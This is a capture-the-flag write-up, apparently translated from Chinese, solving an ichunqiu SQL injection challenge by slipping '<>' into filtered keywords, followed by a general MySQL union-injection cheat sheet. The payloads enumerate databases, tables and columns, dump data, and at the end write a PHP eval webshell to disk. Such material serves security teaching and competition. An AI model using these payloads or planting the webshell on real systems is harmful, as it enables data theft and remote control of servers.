Visiting the challenge site
- The page gives a hint:
  flag{在数据库中}
  ("flag{in the database}"), and the URL is xxx.ichunqiu.com/index.php?id=1, which has the usual shape of a SQL injection point.
- Viewing the page source, as usual, shows the hint
  SELECT * FROM info WHERE id=1
  so this is a numeric (integer-type) injection.
Finding the vulnerability
- ?id=1 and 1=1
  The page answers "inj code!". Several more tests show that the filter blocks and, or, select, order.
- According to an expert's writeup, the way around the filter here is to insert
  <>
  in the middle of a sensitive word; after that, manual injection works normally.
Getting the flag
- ?id=1 ord<> by 3
  The page echoes normally, which indicates that the query has three fields.
- ?id=1 union sel<>ect 1, 2, 3
  The page echoes 2, which indicates that the second field is the one reflected in the output.
- Get the database name:
  ?id=1 union sel<>ect 1, database(), 3
  The page echoes the database name: sqli
- Get the table names:
  ?id=1 union sel<>ect 1, table_name, 3 from information_schema.tables where table_schema=database()
  The page echoes the table names: info, users
- Get the fields:
  ?id=1 union sel<>ect 1, column_name, 3 from information_schema.columns where table_name='info'
  The page echoes the fields: id, title, flAg_T5ZNdrm
- Get the flag:
  ?id=1 union sel<>ect 1, flAg_T5ZNdrm, 3 from info
  This returns the flag.
MySQL union select injection review
- A UNION statement requires the same number of fields in the queries before and after it, so the number of fields is generally found first by brute force with order by (e.g., four fields):
  order by 4
- Find the field positions, to see which position is echoed:
  union select 1,2,3,4
- Dump database information using the built-in functions version(), database(), user() and @@global.version_compile_os:
  union select version(),database(),user(), @@global.version_compile_os
- Dumping the database: MySQL > 5.0 has the built-in database information_schema, which stores the structure information of all MySQL databases and tables.
  Query the existing databases:
  union select 1,2,3,schema_name from information_schema.schemata
- Dumping the database: enumerate the tables
  union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()
- Dumping the database: enumerate the fields (表名 is a placeholder for the table name)
  union select 1,2,3,group_concat(column_name) from information_schema.columns where table_name='表名'
- Dumping the database: read the content (字段名 is a placeholder for the field name, 表名 for the table name)
  union select 1,2,3,字段名 from 表名 limit 0,1
- Writing a webshell directly
  Condition 1: the physical path of the site is known
  Condition 2: the privileges are high enough
  Condition 3: magic_quotes_gpc = OFF
select '<?php eval($_POST[cmd]);?>' into file 'D:\\out.php'
================================================================